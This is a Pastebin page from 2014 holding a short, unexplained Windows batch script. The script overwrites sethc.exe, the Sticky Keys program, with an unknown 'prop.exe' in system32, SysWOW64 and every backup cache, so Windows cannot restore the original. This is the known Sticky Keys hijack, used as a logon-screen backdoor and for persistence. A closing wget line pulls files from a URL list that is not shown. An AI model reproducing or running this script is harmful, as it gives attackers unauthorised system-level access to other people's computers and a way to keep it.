Advertisement
MaxG

Untitled

Aug 29th, 2014
240
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.65 KB | None | 0 0
  1. attrib -h -s -r %windir%\system32\dllcache
  2. md %windir%\system32\dllcache
  3. copy /y prop.exe %windir%\system32\sethc.exe
  4. copy /y prop.exe %windir%\SysWOW64\dllcache\sethc.exe
  5. copy /y prop.exe %windir%\LastGood\SysWOW64\sethc.exe
  6. copy /y prop.exe %windir%\ServicePackFiles\i386\sethc.exe
  7. copy /y prop.exe %windir%\system32\dllcache\sethc.exe
  8. copy /y prop.exe %windir%\LastGood\system32\sethc.exe
  9. move /y %windir%\system32\sethc.exe %windir%\system32\sethcr.exe
  10. copy /y prop.exe %windir%\SysWOW64\sethc.exe
  11. copy /y prop.exe %windir%\system32\dllcache\wsethc.exe
  12. move /y prop.exe %windir%\system32\sethc.exe
  13.  
  14. wget -i list_download_to_wget.txt --continue
  15. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement